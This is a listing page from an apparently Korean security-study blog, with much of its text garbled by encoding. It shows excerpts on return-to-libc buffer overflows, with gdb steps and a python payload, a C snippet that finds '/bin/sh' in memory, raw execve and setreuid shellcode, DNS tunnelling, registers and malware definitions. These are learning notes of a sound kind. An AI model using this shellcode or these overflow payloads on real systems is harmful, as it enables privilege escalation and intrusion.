728x90 ๋ฐ์ํ Security Study83 system /bin/sh ์ฃผ์ ์ฐพ๊ธฐ #include #include int main(int argc,char *argv[]) {long shell;shell = ์์คํ ์ฃผ์;while(memcmp((void*)shell,("/bin/sh"),8)) shell++;printf("%p\n",shell);} Security Study/System 2015. 9. 15. network base 64 = 64์ง์๋ฏธ๋ฆฌ base 64 ์์ธํ๋ฅผ ๊ตฌ์ฑํด์ ธ์์ผ๋ฉฐ 6bit์ฉ ๋๋ ํฌํจํ๋ค.base 64 ๋ ๋์๋ฌธ์๊ฐ ๊ตฌ๋ณ๋์ด์๋ค.๋๋ฉ์ธ ๋ค์์ ์ฌ๋ฌ๊ฐ์ ๋๋ฉ์ธ ๋ผ๋ฒจ๋ก ๊ตฌ์ฑ๋์ด์๋ค. ํฐ๋ ํจํท์ ์ ํจํทethernet+ip+don't care ํฐ๋ ํจํทethernet+ip+udp(53)+dns+encoded payload Security Study/Network 2015. 9. 14. system 2 gdb์์์์ blocking ํจ์ ์ ๋ ฅ r Security Study/System 2015. 9. 13. system 1์ผ์ฐจ buf[248] + sfp[4] + ret ulimit -s unlimited //์คํํฌ๊ธฐ๋ฅผ ๋ฌดํ์ ์ผ๋ก ๋๋ ค ASLR์ด ์ ์ฉ์๋จ system,execve - ebp+8์์น์์๋๊ฒ์ ์ธ์๋ก๋ฐ์ buf[248] + sfp [4] + ์กฐ์(system) + AAAA + /bin/sh - system("/bin/sh") b main r 1 p system - system์ฃผ์ ๊ตฌํ๊ธฐ p exit - exit๊ตฌํ๊ธฐ find &system,+9999999,"/bin/sh" - /bin/sh์ฃผ์ ๊ตฌํ๊ธฐ ./filename $(python -c 'print "A"*๋ฒํผ+sfp + system + exit + /bin/sh strcpy(bss,\x80asda) strcpy(bss,"b") ./filename buf+sfp.. Security Study/System 2015. 9. 12. system shellcode // 16 Byte, setreuid( geteuid() , geteuid() );\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80 // 25 Byte, shellcode\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80 // 41 Byte\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0.. Security Study/System 2015. 9. 10. ๋ฒ์ฉ ๋ ์ง์คํฐ(General Register) ๋ฒ์ฉ ๋ ์ง์คํฐ(General Register)EAX (AX, AH, AL) - ๋์ ์ฐ์ฐ๊ธฐ, ๊ณฑ์ ๊ณผ ๋๋์ ์ฐ์ฐ์์ ์๋์ผ๋ก ์ฌ์ฉEBX (BX, BH, BL) - ๋ฒ ์ด์ค ๋ ์ง์คํฐ, ํน์ ์ฃผ์๋ฅผ ์ง์ ECX (CX, CH, CL) - ์๋ฅผ ์ธ์๋ฆผ, ์๋์ผ๋ก ๋ฃจํ ์นด์ดํฐ๋จ(๋ฐ๋ณต์ ์ธ ๋ช ๋ น์ ์ํ์)EDX (DX, DHT, DL) - ๋ฐ์ดํฐ ๋ ์ง์คํฐ, ์ ์ถ๋ ฅ ์ฐ์ฐ์์ ๋ฐ๋์ ๊ฐ์ ์ฃผ์ ์ง์ ์ ์ฌ์ฉESI (SI) - ์ฝ๊ธฐ ์ธ๋ฑ์ค, ๋ฌธ์์ด ์ ์ก์ด๋ ๋น๊ต์์ ์ฌ์ฉ๋๋๋ฐ ์ฃผ๋ก ์์ค ๋ฌธ์์ด์ ์คํ์ ์ ๊ฐ๋ฆฌํดEDI (DI) - ์ฐ๊ธฐ ์ธ๋ฑ์ค EBP (BP) - ๋ฒ ์ด์ค ํฌ์ธํฐ, ์คํ์ ๋ฐ์ดํฐ์ ์ ๊ทผํ๊ธฐ ์ํด ์ฌ์ฉESP (SP) - ์คํ ํฌ์ธํฐ, ํ์ฌ๊น์ง ์ฌ์ฉ๋ ์คํ์ ์์น๋ฅผ ์ ์ฅ, ์คํ ์ต์๋ถ์ ์คํ์ ์ ๊ฐ๋ฆฌํดEIP - ๋ช ๋ น์ด .. Security Study/Reversing 2015. 9. 8. ์ด์์ฒด์ ์ด์์ฒด์ : ์์คํ ์์(ํ๋์จ์ด+์ํํธ์จ์ด)์ ํจ์จ์ ์ผ๋ก ์ฌ์ฉํ๊ณ , ์ปดํจํฐ-์ฌ์ฉ์ ๊ฐ์ ํธ๋ฆฌํ ์ธํฐํ์ด์ค๋ฅผ ์ ๊ณตํ๋ฉฐ์ฒ๋ฆฌ๋ฅ๋ ฅ(Throughput), ์ ๋ขฐ๋(Reliability), ์ฌ์ฉ๊ฐ๋ฅ๋(Availability)์ ํฅ์๊ณผ ๋ฐํ์๊ฐ(Turnaround time)์ ๋จ์ถํ์ฌ ์ฃผ๋ ์ญํ ์ ํ๋ค. (1) ์ด์์ฒด์ ์ ์ฃผ์๊ธฐ๋ฅ โ ํ๋ก์ธ์ค ๊ด๋ฆฌ: ํ๋์จ์ด์ ์์กดํ๋ ๊ฐ์ฅ ํ์ ๋จ์ ์์ค์ผ๋ก ํ๋ก์ธ์ค ์ค์ผ์ค๋ง์ ํตํด ์คํ ๊ฐ๋ฅํ ํ๋ก์ธ์ค๋ฅผ ์ถ์ ๊ด๋ฆฌ ํ๋ค. โก ์ฃผ๊ธฐ์ต์ฅ์น ๊ด๋ฆฌ: ์ฃผ๊ธฐ์ต์ฅ์น์ ์ ๊ทผ์ ๊ด๋ฆฌ ์ ์ดํ๋ ์ฅ์น๋ถ๋ถ์ผ๋ก ์ฃผ์๋ณํ, ๊ธฐ์ต๋ณดํธ, ๋ฒํผ๊ธฐ์ต ๋ฑ์ ๊ธฐ๋ฅ์ ์ํํ๋ค. โข ๋ณด์กฐ๊ธฐ์ต์ฅ์น ๊ด๋ฆฌ: ํ๋๋์คํฌ์ ๊ฐ์ ๋ณด์กฐ ๊ธฐ์ต์ฅ์น์ ๋ํ ์ ๊ทผ๊ด๋ฆฌ, ์ ์ด ๋ฑ์ ์ํํ๋ค. โฃ ์ ์ถ๋ ฅ์์คํ ๊ด๋ฆฌ: ์ค์๊ธฐ์ต์ฅ์น์ ์ธ๋ถ ์ .. Security Study/System Security 2015. 9. 3. ์์คํ ๊ณผ ๊ด๋ จํ ๋ณด์ ๊ธฐ๋ฅ ์์คํ ๊ณผ ๊ด๋ จํ ๋ณด์ ๊ธฐ๋ฅ ๊ณ์ ๊ณผ ํจ์ค์๋ ๊ด๋ฆฌ ์ ์ ํ ๊ถํ์ ๊ฐ์ง ์ฌ์ฉ์๋ฅผ ์๋ณํ๊ธฐ ์ํ ๊ฐ์ฅ ๊ธฐ๋ณธ์ ์ธ ์ธ์ฆ ์๋จ ์์คํ ์์๋ ๊ณ์ ๊ณผ ํจ์ค์๋ ๊ด๋ฆฌ๊ฐ ๋ณด์์ ์์ ์ธ์ ๊ด๋ฆฌ ์ฌ์ฉ์์ ์์คํ ๋๋ ๋ ์์คํ ๊ฐ์ ํ์ฑํ๋ ์ ์์ ๋ํ ๊ด๋ฆฌ ์ผ์ ์๊ฐ์ด ์ง๋ ๊ฒฝ์ฐ ์ ์ ํ ์ธ์ ์ ์ข ๋ฃํ๊ณ , ๋น ์ธ๊ฐ์์ ์ํ ์ธ์ ๊ฐ๋ก์ฑ๊ธฐ๋ฅผ ํต์ ์ ๊ทผ ์ ์ด ์์คํ ์ด ๋คํธ์ํฌ ์์์ ๋ค๋ฅธ ์์คํ ์ผ๋ก๋ถํฐ ์ ์ ํ ๋ณดํธ๋ ์ ์๋๋ก ๋คํธ์ํฌ ๊ด์ ์์ ์ ๊ทผ์ ํต์ ๊ถํ ๊ด๋ฆฌ ์์คํ ์ ๊ฐ ์ฌ์ฉ์๊ฐ ์ ์ ํ ๊ถํ์ผ๋ก ์ ์ ํ ์ ๋ณด ์์ฐ์ ์ ๊ทผํ ์ ์๋๋ก ํต์ ๋ก๊ทธ ๊ด๋ฆฌ ์์คํ ๋ด๋ถ ํน์ ๋คํธ์ํฌ๋ฅผ ํตํ ์ธ๋ถ์์ ์์คํ ์ ์ด๋ค ์ํฅ์ ๋ฏธ์น ๊ฒฝ์ฐ ํด๋น ์ฌํญ์ ๊ธฐ๋ก ์ทจ์ฝ์ ๊ด๋ฆฌ ์์คํ ์ ๊ณ์ ๊ณผ ํจ์ค์๋ ๊ด๋ฆฌ, ์ธ์ ๊ด๋ฆฌ, ์ ๊ทผ ์ ์ด, ๊ถํ ๊ด๋ฆฌ.. Security Study/System Security 2015. 9. 3. ๋ณด์๊ด์ ์ ๊ฐ๋ ๋ณด์์ ๊ฐ๋ - ๋ณด์์ด๋ ํ๋ฝ๋์ง ์์ ์ ๊ทผ, ์์ , ๋ ธ์ถ, ํผ์, ํ๊ดด ๋ฑ์ ๋ค์ํ ์ฌ์ด๋ฒ์์ ์ํ์ผ๋ก๋ถํฐ ์ ๋ณด๋ฅผ ๋ณดํธํ๋ ๊ฒ์ด๋ค. - ๋ณด์์ ์ฌ์ด๋ฒ ๊ณต๊ฐ์์ ์ ๋ณด ๋ณดํธ์ ๋ณด์ ์ ์ฑ ์ ์๋ฆฝํ๊ณ , ์ํ์ ๋ํ ์๋ฐฉ์ฑ ์ ์ธ์ฐ๋ฉฐ, ์์คํ ์ ๋ํ ์ ๊ทผ ๋ฐ ์ด์์ ํต์ ํ๊ณ ์ธ๋ถ์ ์นจ์ ์ด ๋ฐ์ํ์ ๋ ๋น ๋ฅด๊ฒ ํ์งํด ๋์ํ๊ฑฐ๋ ์์๋ ์์คํ ์ ๋ณต๊ตฌํ๋ ๋ฑ์ ๋ค์ํ ํ๋์ด ์๋ค - ๋ณด์์ ์ฌ์ด๋ฒ์์ ๊ฐ์ข ์ํ์ผ๋ก๋ถํฐ ์ ๋ณด๋ฅผ ๋ณดํธํ๊ธฐ ์ํ ๋ค์ํ ํ๋์ ๋งํ๋ค. ๋ณด์๊ด์ ์ ๊ฐ๋ - ํ๊ตญ ์ฐ์ ๋ณด์ ํํ์์๋ “์ ์ฑ ์๋ฐ ๋๋ ์นจ์ ์ผ๋ก๋ถํฐ ์์คํ ๊ณผ ๋คํธ์ํฌ ์์์ ์์์ ๋ง๊ธฐ ์ํด ๊ด์ ๊ฐ ํ์ํ ๋ชจ๋ ์์คํ ์ ์ค์๊ฐ์ผ๋ก ๋ชจ๋ํฐ๋งํ์ฌ ์ฆ๊ฐ ๋์, ๊ด๋ฆฌํ ์ ์๋๋ก ์ ๋ฌธ ๋ณด์ ์ ์ฒด๊ฐ ํด๋น ์ธ๋ ฅ, ์ ์ฐจ, ๊ธฐ์ ๋ฐ ์ ๋ฌธ ์ง์์ ์ .. Security Study/System Security 2015. 9. 3. ๋ฐ์ด๋ฌ์ค ์ข ๋ฅ ๋ฐ์ด๋ฌ์ค• ์ฌ์ฉ์ ์ปดํจํฐ(๋คํธ์ํฌ๋ก ๊ณต์ ๋ ์ปดํจํฐ ํฌํจ) ๋ด์์ ์ฌ์ฉ์ ๋ชฐ๋ ํ๋ก๊ทธ๋จ์ด๋ ์คํ ๊ฐ๋ฅํ ๋ถ๋ถ์ ๋ณํํด ์์ ๋๋ ์์ ์ ๋ณํ์ ๋ณต์ฌํ๋ ํ๋ก๊ทธ๋จ์ด๋ค.• ๊ฐ์ฅ ํฐ ํน์ฑ์ ๋ณต์ ์ ๊ฐ์ผ์ด๋ค. ๋ค๋ฅธ ๋คํธ์ํฌ์ ์ปดํจํฐ๋ก ์ค์ค๋ก ์ ํ๋์ง๋ ์๋๋ค. ์•์ธํฐ๋ท ๋๋ ๋คํธ์ํฌ๋ฅผ ํตํด์ ์ปดํจํฐ์์ ์ปดํจํฐ๋ก ์ ํ๋๋ ์ ์ฑ ํ๋ก๊ทธ๋จ์ด๋ค.• ์๋์ฐ์ ์ทจ์ฝ์ ๋๋ ์์ฉ ํ๋ก๊ทธ๋จ์ ์ทจ์ฝ์ ์ ์ด์ฉํ๊ฑฐ๋ ์ด๋ฉ์ผ์ด๋ ๊ณต์ ํด๋๋ฅผ ํตํด ์ ํ๋๋ฉฐ, ์ต๊ทผ์๋ ๊ณต์ ํ๋ก๊ทธ๋จ(P2P)์ ์ด์ฉํ์ฌ ์ ํ๋๊ธฐ๋ ํ๋ค.•๋ฐ์ด๋ฌ์ค์ ๋ฌ๋ฆฌ ์ค์ค๋ก ์ ํ๋๋ ํน์ฑ์ด ์๋ค. ํธ๋ก์ด ๋ชฉ๋ง• ๋ฐ์ด๋ฌ์ค๋ ์์ฒ๋ผ ์ปดํจํฐ์ ์ง์ ์ ์ธ ํผํด๋ฅผ ์ฃผ์ง๋ ์์ง๋ง, ์ ์์ ์ธ ๊ณต๊ฒฉ์๊ฐ ์ปดํจํฐ์ ์นจํฌํ์ฌ ์ฌ์ฉ์์ ์ปดํจํฐ๋ฅผ ์กฐ์ข ํ ์ ์๋ ํ๋ก๊ทธ๋จ์ด๋ค.• ๊ณ ์์ ์ผ๋ก ๋ง.. Security Study/System Security 2015. 9. 3. ๋ฐ์ด๋ฌ์ค์ ์ ์ ๋ฐ์ด๋ฌ์ค์ ์ ์- ์ ์ฑ์ฝ๋ ์ค์ ๊ฐ์ฅ ๊ธฐ๋ณธ์ ์ธ ํํ- ์ฌ์ฉ์ ์ปดํจํฐ(๋คํธ์ํฌ๋ก ๊ณต์ ๋ ์ปดํจํฐ ํฌํจ) ๋ด์์ ์ฌ์ฉ์ ๋ชฐ๋ ํ๋ก๊ทธ๋จ์ด๋ ์คํ ๊ฐ๋ฅํ ๋ถ๋ถ์ ๋ณํํด ์์ ๋๋ ์์ ์ ๋ณํ์ ๋ณต์ฌํ๋ ํ๋ก๊ทธ๋จ์ ๋งํจ- ์ต์ด์ ์ ์ฑ ์ฝ๋๊ฐ ๋ง๋ค์ง 1980๋ ๋ ์ดํ์์ 2000๋ ๋ ์ด๋ฐ๊น์ง ์ ์ฑ ์ฝ๋์ ์ฃผ๋ฅ๋ฅผ ์ฐจ์ง 1์ธ๋ : ์์ํ ๋ฐ์ด๋ฌ์ค๋ถํธ ๋ฐ์ด๋ฌ์คํ๋กํผ ๋์คํฌ๋ ํ๋ ๋์คํฌ์ ๋ถํธ ์นํฐ์ ๊ฐ์ผ๋๋ ๋ฐ์ด๋ฌ์ค๋ก, ๋ถํ ํ ๋ ์๋์ผ๋ก ๋์* 1๋จ๊ณ : POSTPOST๋ ํ๋์จ์ด ์์ฒด๊ฐ ์์คํ ์ ๋ฌธ์ ๊ฐ ์๋์ง ๊ธฐ๋ณธ ์ฌํญ์ ์ค์ค๋ก ์ฒดํฌํ๋ ๊ณผ์ BIOS์ ์ํด์ ์คํ๋๋๋ฐ, POST ๋์ค ํ๋์จ์ด์์ ๋ฌธ์ ๊ฐ ๋ฐ๊ฒฌ๋๋ฉด ์ฌ์ฉ์์๊ฒ ์ฌ๋ฌ ๋ฐฉ๋ฒ์ผ๋ก ๊ทธ ๋ฌธ์ ๋ฅผ ์๋ฆผ.* 2๋จ๊ณ : CMOSCMOS์์๋ ๊ธฐ๋ณธ ์ฅ์น์ ๋ํ ์ค์ ๊ณผ ๋ถ.. Security Study/System Security 2015. 9. 3. ์์ด๋? ์์ ๋ฑ์ฅ* ์(Worm)์ ์ธํฐ๋ท ๋๋ ๋คํธ์ํฌ๋ฅผ ํตํด์ ์ปดํจํฐ์์ ์ปดํจํฐ๋ก ์ ํ๋๋ ํ๋ก๊ทธ๋จ์ ์๋ฏธ* 1999๋ ๋ค๋ฅธ ์ฌ๋์ ์ด๋ฉ์ผ ์ฃผ์๋ฅผ ์์งํ๊ณ ์ค์ค๋ก ์ ๋ฌ๋๋ ํํ์ ์ธํฐ๋ท ์์ด ์ถํํ๋ฉด์ ์ผ๋ฐ์ธ์๊ฒ ์์ด๋ผ๋ ์ฉ์ด๊ฐ ์๋ ค์ง๊ธฐ ์์* ์ด๋ฉ์ผ์ ์ฒจ๋ถ ํ์ผ ํํ๋ก ์ฒจ๋ถ๋์ด ํ์ฐ๋๊ฑฐ๋, ์ด์์ฒด์ ๋ ํ๋ก๊ทธ๋จ์ ๋ณด์ ์ทจ์ฝ์ ์ ์ด์ฉํ์ฌ ์ค์ค๋ก ์นจํฌํ๋ ๊ฒ์ด ์ผ๋ฐ์ * ํ์ฌ๋ mIRC ์ฑํ ํ๋ก๊ทธ๋จ, P2P ํ์ผ ๊ณต์ ํ๋ก๊ทธ๋จ, ์ด๋ฉ์ผ ๊ด๋ จ ์คํฌ๋ฆฝํธ ๊ธฐ๋ฅ, ๋คํธ์ํฌ ๊ณต์ ๊ธฐ๋ฅ ๋ฑ์ ํ์ ์ ์ด์ฉํ์ฌ ํ์ฐํ๊ณ ์ฆ์ํ๋ ๊ฒฝ์ฐ๋ ์์ด ํผํด์ ๋ถ์์ฉ์ ๋ฒ์/ํฌ๊ธฐ๊ฐ ๊ณ์ ์ปค์ง๊ณ ์์. MASS Mailerํ ์* MASS Mailerํ ์์ ์๊ธฐ ์์ ์ ํฌํจํ๋ ๋๋ ๋ฉ์ผ ๋ฐ์ก์ ํตํด ํ์ฐ* ์ต๊ทผ ๋ฐ์ํ ์ ์ค ์ฝ 40%.. Security Study/System Security 2015. 9. 3. ์ด์ 1 ยทยทยท 3 4 5 6 7 ๋ค์ 728x90 ๋ฐ์ํ
